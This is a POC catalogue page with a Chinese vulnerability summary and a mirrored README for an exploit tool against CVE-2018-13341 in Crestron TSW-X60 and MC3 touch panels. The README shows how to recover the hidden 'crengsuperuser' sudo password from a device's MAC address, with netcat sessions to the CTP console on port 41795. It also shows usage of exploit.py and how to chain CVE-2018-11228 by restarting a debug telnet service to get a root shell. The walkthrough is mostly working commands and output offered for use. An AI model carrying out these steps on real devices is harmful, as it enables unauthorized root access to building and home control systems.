POC详情: f6f79b3dd2adbcf2e1992daaa5ef5b24d2d00f7a

标题: Crestron TSW-X60和MC3 安全漏洞 (CVE-2018-13341)
描述:Crestron TSW-X60和MC3都是美国Crestron Electronics公司的产品。Crestron TSW-X60是一款交互式触摸屏设备。MC3是一款智能家居控制设备。 Crestron TSW-X60 2.001.0037.001之前版本和MC3 1.502.0047.00之前版本中存在安全漏洞,该漏洞源于具有常规权限的用户可以根据相关信息计算出sudo账号密码。攻击者可利用该漏洞执行隐藏的API调用并绕过CTP控制台沙盒环境。
This Tool Aims to Exploit the CVE-2018-13341
# CVE-2018-13341
This Tool Aims to Exploit the CVE-2018-13341, By Using the MAC address of the targeted device, you can recover the password of the *"crengsuperuser"* hidden account which has elevated privileges and allow you to run **SUDO** commands.

The Crestron Toolbox Protocol (CTP) can be connected to by accessing port **41795** on the TSW-XX60 device.

# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]

	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

## Requirements

This tool requires the CryptoGraphy module.

# pip3 install cryptography
# pip3 install -r requirements.txt

## Getting Started

usage: exploit.py [-h] [-m MAC]

# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass

## Exploiting the CVE-2018-11228

The [CVE-2018-11228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11228) allows unauthenticated RCE via Bash Shell Service in Crestron Terminal Protocol (*CTP*). After getting the password of the *"crengsuperuser"* hidden account you can get a **root** access on the Machine.

# nc -C w.x.y.z 41795

TSW-760 Control Console

Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted


Then, in a new shell, you can get **root** access on the box.

# telnet w.x.y.z

bash# whoami

Credit Goes to : axcheron 

[4.0K] /data/pocs/f6f79b3dd2adbcf2e1992daaa5ef5b24d2d00f7a ├── [1.9K] exploit.py ├── [1.9K] README.md └── [ 13] requirements.txt 0 directories, 3 files
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